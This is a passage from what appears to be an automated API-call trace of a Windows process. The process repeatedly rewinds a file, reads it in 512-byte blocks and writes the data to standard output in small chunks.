(_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.727] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] 
GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 
[0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.728] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.729] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType 
(hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.730] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.730] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.731] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.732] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.733] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, 
lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 
